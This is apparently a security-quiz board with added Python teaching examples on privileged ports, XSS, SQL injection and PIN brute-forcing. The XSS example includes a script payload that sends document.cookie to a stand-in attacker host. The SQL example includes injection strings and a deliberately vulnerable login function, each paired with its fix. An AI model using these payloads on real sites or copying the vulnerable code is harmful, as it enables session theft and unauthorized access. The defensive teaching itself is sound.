Certified!
Attacked!
Ports and Services
Secure Protocols
More social engineering
100
This international standard (ISO/IEC 15408), usually abbreviated CC, provides a framework for specifying the security functional and assurance requirements of an IT product and for having the product independently evaluated against them, with Evaluation Assurance Levels (EAL1 to EAL7) expressing how rigorously the evaluation was done
What is Common Criteria?
100
A type of attack in which people, rather than systems, are the target: the attacker manipulates a person into handing over information or access
What is social engineering?
100
What is the lowest port number that a non-privileged UNIX user can bind a service to? (Ports below it are reserved for root; on Linux the CAP_NET_BIND_SERVICE capability or the net.ipv4.ip_unprivileged_port_start sysctl can relax this rule.)
What is 1024?
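Added example (not part of the original board): a small Python check of the privileged-port rule above. It reads the Linux sysctl when present and otherwise assumes the classic boundary of 1024, then tries to bind a listener so the reader can see the PermissionError a non-root process gets on low ports. The port list and the `classify_port` / `try_bind` helper names are this example's own choices.

```python
import os
import socket
from typing import Optional

DEFAULT_PRIVILEGED_BOUNDARY = 1024  # classic UNIX rule: ports 0-1023 need root


def privileged_port_boundary() -> int:
    """Return the first port an unprivileged process may bind.

    Linux exposes the boundary as a sysctl (net.ipv4.ip_unprivileged_port_start);
    other systems, and Linux without /proc, fall back to the classic 1024.
    """
    try:
        with open("/proc/sys/net/ipv4/ip_unprivileged_port_start") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return DEFAULT_PRIVILEGED_BOUNDARY


def classify_port(port: int, boundary: Optional[int] = None) -> str:
    """Label a port 'privileged' or 'unprivileged' relative to the boundary."""
    if not 0 <= port <= 65535:
        raise ValueError(f"invalid port {port}")
    if boundary is None:
        boundary = privileged_port_boundary()
    return "privileged" if port < boundary else "unprivileged"


def try_bind(port: int) -> str:
    """Attempt to bind a TCP listener on localhost and report what happened.

    As a non-root user on a default Linux box, ports below the boundary give
    'permission denied'; ports already in use give 'failed: Address already in use'.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("127.0.0.1", port))
        return "bound"
    except PermissionError:
        return "permission denied"
    except OSError as e:
        return f"failed: {e.strerror}"
    finally:
        s.close()


if __name__ == "__main__":
    print("euid:", os.geteuid(), "boundary:", privileged_port_boundary())
    for p in (80, 443, 1023, 1024, 8080):
        print(p, classify_port(p), try_bind(p))
```

Run it once as a normal user and once with `sudo` (or after `setcap cap_net_bind_service=+ep` on the interpreter) to see the difference the rule makes; the sysctl read shows why the number 1024 is a default rather than a constant on modern Linux.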
100
The secure version of MIME, adding digital signatures and encryption to e-mail messages
What is S/MIME?
100
Refers to an unauthorized person listening in on conversations of employees or other authorized personnel discussing sensitive topics
What is eavesdropping?
200
This US law governs the privacy and security of protected health information in the health industry
What is HIPAA (the Health Insurance Portability and Accountability Act)?
200
Occurs when a program writes more data into a fixed-size buffer than it was sized to hold because the length of the input is never checked; the excess overwrites adjacent memory and can corrupt data or hijack control flow (classic in C code that uses strcpy or gets)
What is a buffer overflow?
200
The standard ports for the File Transfer Protocol (FTP) service
What are ports 21 (control) and 20 (active-mode data), TCP?
200
Was developed by Netscape to secure Internet-based client/server interactions; every version of it is now deprecated in favour of its successor, TLS
What is Secure Sockets Layer (SSL)?
200
Refers to convincing personnel to grant access to sensitive information or protected systems by pretending to be someone who is authorized or who requires that access
What is masquerading? (also accepted: impersonation, pretexting)
300
This ISO standard is a specification for an information security management system (ISMS)
What is ISO 27001?
300
An attack that injects attacker-controlled script into a web page, usually because the site reflects or stores user input without encoding it. When a victim views the page, the script runs in their browser under the site's origin, letting the attacker steal session data or act as the user
What is cross-site scripting (XSS)?
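Added example (not part of the original board): a Python rendering of a comment page in its vulnerable and hardened forms, to show the two things the XSS clue above turns on. Body text is fixed by HTML-encoding it; a URL placed in an `href` is not, because `javascript:` contains nothing that encoding changes, so the scheme has to be validated instead. The comment, the link and the `render_unsafe` / `render_safe` / `safe_href` helpers are constructed for this example.

```python
import html
from urllib.parse import urlsplit

# Constructed sample input: what an attacker might submit to a comment form.
MALICIOUS_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
MALICIOUS_LINK = "javascript:alert(document.cookie)"

TEMPLATE = '<p class="comment">{body}</p><a href="{href}">profile</a>'


def render_unsafe(comment: str, profile_url: str) -> str:
    """Vulnerable: user input is dropped straight into the page markup."""
    return TEMPLATE.format(body=comment, href=profile_url)


def safe_href(url: str) -> str:
    """Allow only http/https URLs in a link; anything else becomes '#'.

    html.escape would leave 'javascript:alert(1)' untouched, so for an
    attribute that is interpreted as a URL the scheme itself must be checked.
    """
    scheme = urlsplit(url.strip()).scheme.lower()
    return html.escape(url, quote=True) if scheme in ("http", "https") else "#"


def render_safe(comment: str, profile_url: str) -> str:
    """Hardened: encode for the HTML body context, validate the URL for the attribute."""
    return TEMPLATE.format(body=html.escape(comment, quote=True),
                           href=safe_href(profile_url))


def has_active_content(page: str) -> bool:
    """Crude check used only to make the difference between the two renders visible."""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    print("unsafe:", render_unsafe(MALICIOUS_COMMENT, MALICIOUS_LINK))
    print("safe:  ", render_safe(MALICIOUS_COMMENT, MALICIOUS_LINK))
```

In a real application the encoding belongs in the template engine (autoescaping on), and a Content-Security-Policy header limits the damage when some path is missed; the point of the two functions is that the encoding must match the context the data lands in.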
300
The standard port for the Simple Mail Transfer Protocol (SMTP) service (mail submission from clients normally uses 587, or 465 with implicit TLS)
What is port 25 (TCP)?
300
Was developed for the UNIX platform to encrypt and authenticate remote logins and other communications (think of it as the replacement for plaintext telnet, rlogin and rsh)
What is Secure Shell (SSH)?
300
Causes the telephone network to display a number on the recipient's caller ID that implies the call is coming from a legitimate source
What is caller ID spoofing? (also accepted: fake or forged caller ID)
400
This certification says that (ISC)² considers you a Certified Information Systems Security Professional
What is CISSP?
400
This attack occurs when an attacker places database commands in a user input field of a form and the application concatenates that input into a query, so the commands execute on the database server
What is SQL injection?
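Added example (not part of the original board): a Python login check against an in-memory SQLite table, written once with string concatenation and once with a parameterised query, so the injection described above can be seen succeeding and then failing. The user table, the plaintext passwords (kept only so the demo is short; real systems store hashes) and the `login_vulnerable` / `login_safe` names are constructed for this example.

```python
import sqlite3

# Constructed sample data for the demonstration.
USERS = [("alice", "correct horse"), ("admin", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: input is pasted into the SQL text, so a quote in the input
    ends the string literal and the rest is parsed as SQL."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: the driver sends the values separately from the query text,
    so they can only ever be compared as data."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Classic payloads: comment out the password check, or make the WHERE always true.
PAYLOAD_COMMENT = "admin' --"
PAYLOAD_TAUTOLOGY = "' OR '1'='1"


def demo() -> dict:
    """Run both logins with a real credential and with each payload."""
    conn = make_db()
    return {
        "legit_vuln": login_vulnerable(conn, "alice", "correct horse"),
        "legit_safe": login_safe(conn, "alice", "correct horse"),
        "comment_vuln": login_vulnerable(conn, PAYLOAD_COMMENT, "wrong"),
        "comment_safe": login_safe(conn, PAYLOAD_COMMENT, "wrong"),
        "tautology_vuln": login_vulnerable(conn, "nobody", PAYLOAD_TAUTOLOGY),
        "tautology_safe": login_safe(conn, "nobody", PAYLOAD_TAUTOLOGY),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:15s} -> {'logged in' if ok else 'rejected'}")
```

With the comment payload the vulnerable query becomes `... WHERE username = 'admin' --' AND password = 'wrong'`, and SQLite ignores everything after `--`; with the tautology payload the `OR '1'='1'` makes the WHERE true for every row. The parameterised version rejects both because the quotes never reach the parser.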
400
The Remote Desktop Protocol (RDP) listens on this port, which on most machines should be firewalled to specific management IP ranges (or reachable only over a VPN) rather than exposed to the Internet
What is port 3389 (TCP, with UDP 3389 also used by newer versions)?
400
A public-key (hybrid) cryptosystem used for e-mail and file encryption, in which each message is encrypted with a fresh symmetric key that is itself encrypted to the recipient's public key; created by Phil Zimmermann
What is Pretty Good Privacy (PGP)?
400
The use of a fictitious scenario to persuade someone to perform an action or give out information that the requester is not authorized to have (usually conducted by phone)
What is pretexting?
500
How many individual certifications does AWS offer? (clue: more than 4, fewer than 20; the count changes as certifications are added and retired)
What is 12?
500
Trying every possible combination of a password, PIN or token until one works
What is brute force (password cracking)?
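Added example (not part of the original board): a Python brute-force search for a 4-digit PIN against its salted SHA-256 hash, followed by the same search run through a login guarded by an account lockout, to show both why short secrets fall quickly (10^digits guesses at most) and what the countermeasure does. The PIN, the fixed salt and the `brute_force_pin` / `LockoutGuard` / `online_attack` names are constructed for this example.

```python
import hashlib
import itertools
from typing import Dict, Optional, Tuple

# Constructed example: a 4-digit PIN stored as a salted SHA-256 hash.
SALT = b"demo-salt"   # fixed so the example is reproducible; use a random salt per user in practice
SECRET_PIN = "0427"


def pin_hash(pin: str, salt: bytes = SALT) -> str:
    return hashlib.sha256(salt + pin.encode()).hexdigest()


def brute_force_pin(target: str, digits: int = 4,
                    salt: bytes = SALT) -> Tuple[Optional[str], int]:
    """Offline attack: try every PIN of the given length in order.

    Returns (pin, attempts). Nothing limits the attacker here except the cost
    of one hash per guess, which is why a slow KDF (bcrypt, scrypt, PBKDF2)
    rather than plain SHA-256 matters for stored secrets.
    """
    attempts = 0
    for combo in itertools.product("0123456789", repeat=digits):
        attempts += 1
        candidate = "".join(combo)
        if pin_hash(candidate, salt) == target:
            return candidate, attempts
    return None, attempts


class LockoutGuard:
    """Countermeasure for the online case: cap the guesses per account."""

    def __init__(self, max_failures: int = 5):
        self.max_failures = max_failures
        self.failures: Dict[str, int] = {}

    def check(self, account: str, pin: str, stored_hash: str) -> str:
        if self.failures.get(account, 0) >= self.max_failures:
            return "locked"           # refuse even a correct guess once locked
        if pin_hash(pin) == stored_hash:
            self.failures[account] = 0
            return "ok"
        self.failures[account] = self.failures.get(account, 0) + 1
        return "wrong"


def online_attack(guard: LockoutGuard, account: str, stored_hash: str,
                  digits: int = 4) -> Tuple[Optional[str], int]:
    """Same search, but through the guarded login: cut off after max_failures."""
    attempts = 0
    for combo in itertools.product("0123456789", repeat=digits):
        attempts += 1
        candidate = "".join(combo)
        result = guard.check(account, candidate, stored_hash)
        if result == "ok":
            return candidate, attempts
        if result == "locked":
            return None, attempts
    return None, attempts


if __name__ == "__main__":
    stored = pin_hash(SECRET_PIN)
    print("offline:", brute_force_pin(stored))                       # ('0427', 428)
    print("online, 5-strike lockout:", online_attack(LockoutGuard(5), "alice", stored))
```

The offline search finds the PIN on guess 428 and would need at most 10,000; the guarded login returns "locked" on the sixth guess. Lockouts can themselves be abused for denial of service, so production systems usually pair a per-account counter with per-source rate limiting and a slow hash.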
500
The standard port for the Trivial File Transfer Protocol (TFTP) service
What is port 69 (UDP)?
500
A secure version of FTP
What is FTPS (FTP over TLS)? (also accepted: SFTP and SCP, which run over SSH and are separate protocols rather than FTP itself)
500
The most effective countermeasure against social engineering
What is employee security awareness training?